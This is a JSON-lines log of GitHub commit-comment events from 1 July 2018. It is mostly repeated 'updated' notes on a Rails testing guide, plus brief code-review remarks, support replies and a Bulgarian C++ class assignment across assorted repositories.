{"id":"7902604593","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556860,"position":1011,"line":861,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:53Z","updated_at":"2018-07-01T07:33:53Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:53Z"}
{"id":"7902604675","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556861,"position":1048,"line":898,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:33:57Z","updated_at":"2018-07-01T07:33:57Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:33:57Z"}
{"id":"7902604815","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556862,"position":1060,"line":901,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:06Z","updated_at":"2018-07-01T07:34:06Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:06Z"}
{"id":"7902604880","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556863,"position":1068,"line":907,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:09Z","updated_at":"2018-07-01T07:34:09Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:09Z"}
{"id":"7902604969","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556864,"position":1092,"line":931,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:14Z","updated_at":"2018-07-01T07:34:14Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:14Z"}
{"id":"7902605056","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556865,"position":1104,"line":943,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:18Z","updated_at":"2018-07-01T07:34:18Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:18Z"}
{"id":"7902605257","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556866,"position":1145,"line":973,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:30Z","updated_at":"2018-07-01T07:34:30Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:30Z"}
{"id":"7902605342","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556867,"position":1182,"line":1007,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:35Z","updated_at":"2018-07-01T07:34:35Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:35Z"}
{"id":"7902605440","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556869,"position":1193,"line":1021,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:40Z","updated_at":"2018-07-01T07:34:40Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:40Z"}
{"id":"7902605492","type":"CommitCommentEvent","actor":{"login":"long1012"},"repo":{"name":"long1012/smilevue"},"payload":{"comment":{"id":29556870,"position":null,"line":null,"path":null,"commit_id":"368d9bf6227d35398645f43baf57b7f17fa321a2","created_at":"2018-07-01T07:34:43Z","updated_at":"2018-07-01T07:34:43Z","author_association":"OWNER","body":"防止用户注册时重复提交"}},"created_at":"2018-07-01T07:34:43Z"}
{"id":"7902605511","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556871,"position":1199,"line":1026,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:43Z","updated_at":"2018-07-01T07:34:43Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:43Z"}
{"id":"7902605572","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556872,"position":1219,"line":1040,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:48Z","updated_at":"2018-07-01T07:34:48Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:48Z"}
{"id":"7902605645","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556873,"position":1226,"line":1046,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:51Z","updated_at":"2018-07-01T07:34:51Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-01T07:34:51Z"}
{"id":"7902605708","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556874,"position":1240,"line":1056,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:34:56Z","updated_at":"2018-07-01T07:34:56Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:34:56Z"}
{"id":"7902605783","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556875,"position":1281,"line":1080,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:01Z","updated_at":"2018-07-01T07:35:01Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:01Z"}
{"id":"7902605884","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556876,"position":1327,"line":1097,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:08Z","updated_at":"2018-07-01T07:35:08Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:08Z"}
{"id":"7902606074","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556877,"position":1345,"line":1110,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:18Z","updated_at":"2018-07-01T07:35:18Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:18Z"}
{"id":"7902606268","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556878,"position":1377,"line":1133,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:29Z","updated_at":"2018-07-01T07:35:29Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:29Z"}
{"id":"7902606343","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556879,"position":1395,"line":1148,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:33Z","updated_at":"2018-07-01T07:35:33Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:33Z"}
{"id":"7902606414","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556881,"position":1433,"line":1167,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:37Z","updated_at":"2018-07-01T07:35:37Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:37Z"}
{"id":"7902606487","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556882,"position":1450,"line":1179,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:42Z","updated_at":"2018-07-01T07:35:42Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:42Z"}
{"id":"7902606627","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556884,"position":1485,"line":1203,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:50Z","updated_at":"2018-07-01T07:35:50Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:50Z"}
{"id":"7902606683","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556885,"position":1493,"line":1209,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:35:53Z","updated_at":"2018-07-01T07:35:53Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:35:53Z"}
{"id":"7902606857","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556886,"position":1568,"line":1251,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:04Z","updated_at":"2018-07-01T07:36:04Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:04Z"}
{"id":"7902607014","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556888,"position":1574,"line":1256,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:09Z","updated_at":"2018-07-01T07:36:09Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:09Z"}
{"id":"7902607157","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556889,"position":1637,"line":1283,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:14Z","updated_at":"2018-07-01T07:36:14Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:14Z"}
{"id":"7902607212","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556890,"position":1665,"line":1294,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:18Z","updated_at":"2018-07-01T07:36:18Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:18Z"}
{"id":"7902607280","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556891,"position":1673,"line":1299,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:22Z","updated_at":"2018-07-01T07:36:22Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:22Z"}
{"id":"7902607359","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556892,"position":1700,"line":1316,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:28Z","updated_at":"2018-07-01T07:36:28Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:28Z"}
{"id":"7902607553","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556893,"position":1725,"line":1326,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:39Z","updated_at":"2018-07-01T07:36:39Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:39Z"}
{"id":"7902607678","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556895,"position":1797,"line":1370,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:46Z","updated_at":"2018-07-01T07:36:46Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:46Z"}
{"id":"7902607751","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556896,"position":1818,"line":1380,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:50Z","updated_at":"2018-07-01T07:36:50Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:50Z"}
{"id":"7902607844","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556897,"position":1856,"line":1433,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:36:55Z","updated_at":"2018-07-01T07:36:55Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:36:55Z"}
{"id":"7902608120","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556898,"position":1876,"line":1459,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:37:12Z","updated_at":"2018-07-01T07:37:12Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:37:12Z"}
{"id":"7902608303","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29556899,"position":2019,"line":1576,"path":"guides/source/testing.md","commit_id":"4ea09d8c1decf178d4135042d30cf9824000df76","created_at":"2018-07-01T07:37:23Z","updated_at":"2018-07-01T07:37:23Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-01T07:37:23Z"}
{"id":"7902611926","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29556907,"position":null,"line":null,"path":null,"commit_id":"f8047a74dd5ef3ecd2f90a50616f03720af02acf","created_at":"2018-07-01T07:40:51Z","updated_at":"2018-07-01T07:40:51Z","author_association":"CONTRIBUTOR","body":"怎么你的repo初始化会有.gitattributes而我的没有呢？？\r\n\r\n学习了（https://github.com/sshockwave/Online-Judge-Solutions/commit/d36c8add158c113438f948e7efa7798fcc1847ad ），谢谢。"}},"created_at":"2018-07-01T07:40:51Z"}
{"id":"7902613636","type":"CommitCommentEvent","actor":{"login":"Varpc"},"repo":{"name":"Varpc/demo"},"payload":{"comment":{"id":29556909,"position":null,"line":null,"path":null,"commit_id":"4ce800ca1afb7f829b37add094a40b1e8508de68","created_at":"2018-07-01T07:42:24Z","updated_at":"2018-07-01T07:42:24Z","author_association":"OWNER","body":"允许上传build/"}},"created_at":"2018-07-01T07:42:24Z"}
{"id":"7902614089","type":"CommitCommentEvent","actor":{"login":"gulten1992"},"repo":{"name":"graphql/graphiql"},"payload":{"comment":{"id":29556910,"position":6,"line":52,"path":"package.json","commit_id":"4bfaab0ded3ea597b538f7cba20fc1e500afd827","created_at":"2018-07-01T07:42:48Z","updated_at":"2018-07-01T07:42:48Z","author_association":"NONE","body":"2018\r\n\r\n"}},"created_at":"2018-07-01T07:42:48Z"}
{"id":"7902614405","type":"CommitCommentEvent","actor":{"login":"orionmerlin"},"repo":{"name":"web-scrobbler/web-scrobbler"},"payload":{"comment":{"id":29556912,"position":null,"line":null,"path":null,"commit_id":"98f23ac85a5ac60e1a468812b4c6bb45c521e0f9","created_at":"2018-07-01T07:43:06Z","updated_at":"2018-07-01T07:43:06Z","author_association":"NONE","body":"Still isn't scrobbling from Pandora for me. I uninstalled/reinstalled and reauthorized the extension and ran a fresh browser with Pandora, but it still isn't detecting music playing. "}},"created_at":"2018-07-01T07:43:06Z"}
{"id":"7902615337","type":"CommitCommentEvent","actor":{"login":"seanmcleod"},"repo":{"name":"JSBSim-Team/jsbsim"},"payload":{"comment":{"id":29556913,"position":null,"line":null,"path":null,"commit_id":"543b1dc4ab226564e940d4701ee0d72ed830b657","created_at":"2018-07-01T07:43:56Z","updated_at":"2018-07-01T07:43:56Z","author_association":"COLLABORATOR","body":"Looks fine. What has been the general rule in terms of case sensitivity for attribute values? "}},"created_at":"2018-07-01T07:43:56Z"}
{"id":"7902616621","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29556917,"position":67,"line":624,"path":"repondeur/zam_repondeur/templates/visionneuse.html","commit_id":"50a51d12a55474e632453a02df6ff20c3ff73beb","created_at":"2018-07-01T07:45:10Z","updated_at":"2018-07-01T07:45:10Z","author_association":"COLLABORATOR","body":"Will clicking the link actually do something here?"}},"created_at":"2018-07-01T07:45:10Z"}
{"id":"7902617490","type":"CommitCommentEvent","actor":{"login":"alexesprit"},"repo":{"name":"web-scrobbler/web-scrobbler"},"payload":{"comment":{"id":29556920,"position":null,"line":null,"path":null,"commit_id":"98f23ac85a5ac60e1a468812b4c6bb45c521e0f9","created_at":"2018-07-01T07:45:57Z","updated_at":"2018-07-01T07:45:57Z","author_association":"MEMBER","body":"It's because I haven't uploaded the fixed version yet."}},"created_at":"2018-07-01T07:45:57Z"}
{"id":"7902617948","type":"CommitCommentEvent","actor":{"login":"Yenthe666"},"repo":{"name":"Yenthe666/auto_backup"},"payload":{"comment":{"id":29556922,"position":null,"line":null,"path":null,"commit_id":"23e809b2e7bc2eff72550cd3cb26489774f32253","created_at":"2018-07-01T07:46:22Z","updated_at":"2018-07-01T07:46:22Z","author_association":"OWNER","body":"You configure the times in the scheduler under the general settings, under schedulers. "}},"created_at":"2018-07-01T07:46:22Z"}
{"id":"7902619952","type":"CommitCommentEvent","actor":{"login":"Andrew-Max"},"repo":{"name":"laracork/food"},"payload":{"comment":{"id":29556927,"position":5,"line":5,"path":"app/controllers/meals_controller.rb","commit_id":"20e552e5f908f7cbf03cff7bff5feaa33bfdbd97","created_at":"2018-07-01T07:48:12Z","updated_at":"2018-07-01T07:48:12Z","author_association":"COLLABORATOR","body":"not sure about  this  :)"}},"created_at":"2018-07-01T07:48:12Z"}
{"id":"7902621307","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29556928,"position":19,"line":39,"path":"repondeur/zam_repondeur/views/reponse.py","commit_id":"50a51d12a55474e632453a02df6ff20c3ff73beb","created_at":"2018-07-01T07:49:20Z","updated_at":"2018-07-01T07:49:20Z","author_association":"COLLABORATOR","body":"We do this at 2 different places → remove duplication with a `to_timestamp` function?\r\n\r\n(Not sure if it’s better but I usually do the conversion with `time.mktime(dt.timetuple())`)."}},"created_at":"2018-07-01T07:49:20Z"}
{"id":"7902621734","type":"CommitCommentEvent","actor":{"login":"MaFeSa"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29556929,"position":null,"line":null,"path":null,"commit_id":"70e6ea319d3bfdfdb34be540dc7d89aa175b5587","created_at":"2018-07-01T07:49:46Z","updated_at":"2018-07-01T07:49:46Z","author_association":"NONE","body":"@blocktrron I confirm, the procedure works correctly!\r\nDo not use the integrated ftp client of windows because it does not recognize \"passive\" command.\r\nEverything works correctly but in the log there are many\r\n`Sun Jul  1 09:47:48 2018 kern.warn kernel: [132821.260906] ath10k_ahb a000000.wifi: Invalid VHT mcs 15 peer stats`\r\n... but this is another question 😉"}},"created_at":"2018-07-01T07:49:46Z"}
{"id":"7902629559","type":"CommitCommentEvent","actor":{"login":"mouloudkachouane"},"repo":{"name":"mouloudkachouane/DL_decision-help-system"},"payload":{"comment":{"id":29556939,"position":null,"line":null,"path":null,"commit_id":"0a0006492206ba3341eacb800d9a8c0ab6178cbb","created_at":"2018-07-01T07:57:13Z","updated_at":"2018-07-01T07:57:13Z","author_association":"OWNER","body":"part 1 \r\nData read\r\nData processing\r\nbiomarkers\r\n\r\nPart 2\r\nDL"}},"created_at":"2018-07-01T07:57:13Z"}
{"id":"7902630027","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29556940,"position":null,"line":null,"path":null,"commit_id":"8e309b01aac0564005a6e22b00c04fc28a927fe8","created_at":"2018-07-01T07:57:40Z","updated_at":"2018-07-01T07:57:40Z","author_association":"OWNER","body":"@twinaphex I upgraded my drivers to 396.24 and I'm getting the same compile error you had. And your fix makes the error go away.\r\nSo it's not related to the platform but to the driver version. I still think this is a compiler bug as I don't see anything wrong in the code."}},"created_at":"2018-07-01T07:57:40Z"}
{"id":"7902631740","type":"CommitCommentEvent","actor":{"login":"binghe"},"repo":{"name":"HOL-Theorem-Prover/HOL"},"payload":{"comment":{"id":29556941,"position":null,"line":null,"path":null,"commit_id":"d931b16f82d1c397330f884a2abdb98278fa0c38","created_at":"2018-07-01T07:59:18Z","updated_at":"2018-07-01T07:59:18Z","author_association":"CONTRIBUTOR","body":"Did I tell you NOT merge from master to master? Instead please rebase your local 'master' first and then append new commits on top of existing one."}},"created_at":"2018-07-01T07:59:18Z"}
{"id":"7902632146","type":"CommitCommentEvent","actor":{"login":"pnkrusteva"},"repo":{"name":"pnkrusteva/Company"},"payload":{"comment":{"id":29556942,"position":null,"line":null,"path":null,"commit_id":"ae0d18348d6fdeb8932945f43433903a972ece02","created_at":"2018-07-01T07:59:40Z","updated_at":"2018-07-01T07:59:40Z","author_association":"OWNER","body":"клас Employee. Всеки служител има:\r\n\r\n-  име - символен низ с произволна дължина.\r\n\r\n-  стаж - цяло неотрицателно число.\r\n\r\n-  getSalary - връща стаж * 2 + 500.\r\n\r\n клас  Sales, който е служител. Всеки продавач има:\r\n\r\n-  брой направени продажби - цяло неотрицателно число.\r\n\r\n-  getSalary - връща брой продажби * 3 + 100.\r\n\r\n клас Programmer, който е Employee. Всеки програмист има:\r\n\r\n-  брой написани програми - цяло неотрицателно число.\r\n\r\n-  getSalary - връща броя на програмите + 200.\r\n\r\nклас Manager, който е едновременно програмист и търговец. Класът има:\r\n\r\n-  прякор - символен низ с произволна дължина.\r\n\r\n-  брой на спечелени акции.\r\n\r\n-  getSalary - метод, връщащ броя акции * 3 + 1000.\r\n\r\nвсеки клас има:\r\n\r\n-  get и set методи за всички характеристики.\r\n\r\n-  канонично представяне, където е необходимо\r\n\r\n-  конструктор с параметри за всички член-данни\r\n\r\nСъщо така, към всеки клас да се добави следната член-функция:\r\n\r\nEmployee* clone() const { return new Derived(*this);}\r\n\r\nкъдето вместо Derived е името на съответния клас. Тази функция да се използва при откопирването на масиви от указатели от тип Employee, реализиращи полиморфизъм.\r\n\r\nклас Company със следните член-данни и методи:\r\n\r\n-  масив от служители (това включва служители, продавачи, програмисти и мениджъри) с произволна дължина;\r\n\r\n-  брой на елементите в този масив;\r\n\r\n-  addEmployee(const Employee&) - добавя работник в масива;\r\n\r\n-  removeSales(int) - премахва продавачите, чиято заплата е по-голяма от числото, подадено като аргумент;\r\n\r\n-  removeProgrammer(int) - премахва програмистите, чиято заплата е по-голяма от числото, подадено като аргумент;\r\n\r\n-  removeManager(int) - премахва шефовете, чиято заплата е по-голяма от числото, подадено като аргумент;\r\n\r\n-  removeEmployee(int) - премахва служителите, чиято заплата е по-голяма от числото, подадено като аргумент."}},"created_at":"2018-07-01T07:59:40Z"}
{"id":"7902632526","type":"CommitCommentEvent","actor":{"login":"Frankkz"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556943,"position":null,"line":null,"path":null,"commit_id":"7172476e3b27a465a429122c5cd3a3d3fb51706f","created_at":"2018-07-01T08:00:01Z","updated_at":"2018-07-01T08:00:01Z","author_association":"NONE","body":"The script will only take the token.txt info if it came from Chrome, I tried pasting it in the way its displayed in Firefox but it was rejecting it all the time saying it couldnt find my token."}},"created_at":"2018-07-01T08:00:01Z"}
{"id":"7902637439","type":"CommitCommentEvent","actor":{"login":"uniquestring"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556961,"position":null,"line":null,"path":null,"commit_id":"0ff8efab714a837f3c037e13c150f203fb50cce7","created_at":"2018-07-01T08:04:03Z","updated_at":"2018-07-01T08:04:03Z","author_association":"NONE","body":"@protox In the salien FAQ Valve says that you will keep your salien for future events.\r\nMaybe you'll get a small advantage in upcoming events if you reached a higher level in the previous sale (like a special item or smth.).\r\nOr maybe you can just show your \"accomplishments\" from previous sales (e.g. \"Salien Veteran 2018\" - \"Reached level 25 in the Salien Game during Summer Sale 2018\") just like the 5 year veteran coin in CS:GO."}},"created_at":"2018-07-01T08:04:03Z"}
{"id":"7902639053","type":"CommitCommentEvent","actor":{"login":"EthanCentaurai"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29556964,"position":null,"line":null,"path":null,"commit_id":"7172476e3b27a465a429122c5cd3a3d3fb51706f","created_at":"2018-07-01T08:05:32Z","updated_at":"2018-07-01T08:05:32Z","author_association":"CONTRIBUTOR","body":"@Frankkz Click on the menu and select Save Page As, and save it as ```token.txt```. Don't paste the contents into a text file."}},"created_at":"2018-07-01T08:05:32Z"}
{"id":"7902640704","type":"CommitCommentEvent","actor":{"login":"sureshchintam01"},"repo":{"name":"sureshchintam01/mygit1"},"payload":{"comment":{"id":29556970,"position":null,"line":null,"path":null,"commit_id":"93b75020e6c47d7de8e30eff73afd2a25b766632","created_at":"2018-07-01T08:07:09Z","updated_at":"2018-07-01T08:07:09Z","author_association":"OWNER","body":"quick update"}},"created_at":"2018-07-01T08:07:09Z"}
{"id":"7902643029","type":"CommitCommentEvent","actor":{"login":"hzyice"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29556972,"position":null,"line":null,"path":null,"commit_id":"d948f800753d5a1be0994b4cf35bc0755c14c75c","created_at":"2018-07-01T08:09:21Z","updated_at":"2018-07-01T08:09:21Z","author_association":"NONE","body":"test  springcloud rabbitmq "}},"created_at":"2018-07-01T08:09:21Z"}
{"id":"7902643891","type":"CommitCommentEvent","actor":{"login":"martinvw"},"repo":{"name":"wborn/smarthome"},"payload":{"comment":{"id":29556973,"position":7,"line":165,"path":"bundles/io/org.eclipse.smarthome.io.net.test/org.eclipse.smarthome.io.net.test.launch","commit_id":"b3e6d642ad07fcaaa56b03222ddcfbd79ad3f37b","created_at":"2018-07-01T08:10:09Z","updated_at":"2018-07-01T08:10:09Z","author_association":"NONE","body":"Could it be that this was part of the reason it failed on my side?"}},"created_at":"2018-07-01T08:10:09Z"}
{"id":"7902644760","type":"CommitCommentEvent","actor":{"login":"kdo70"},"repo":{"name":"kdo70/nv"},"payload":{"comment":{"id":29556974,"position":null,"line":null,"path":null,"commit_id":"aced6fca6efa0fe358d1b0588345455f419ce923","created_at":"2018-07-01T08:10:53Z","updated_at":"2018-07-01T08:10:53Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-01T08:10:53Z"}
{"id":"7902644952","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"akirak/repom.el"},"payload":{"comment":{"id":29556975,"position":21,"line":21,"path":"helm-repos-github.el","commit_id":"5c815c36c97ad537a9cb58d4039cb0cb6e163807","created_at":"2018-07-01T08:11:04Z","updated_at":"2018-07-01T08:11:04Z","author_association":"NONE","body":"It's hard to say based on what you said. Helm is complex and powerful.  It has many options for things like that in its customization settings. You can most likely find a combination that does what you want."}},"created_at":"2018-07-01T08:11:04Z"}
{"id":"7902646099","type":"CommitCommentEvent","actor":{"login":"Aprogiena"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29556981,"position":5,"line":32,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-01T08:12:06Z","updated_at":"2018-07-01T08:12:06Z","author_association":"COLLABORATOR","body":"and brackets"}},"created_at":"2018-07-01T08:12:06Z"}
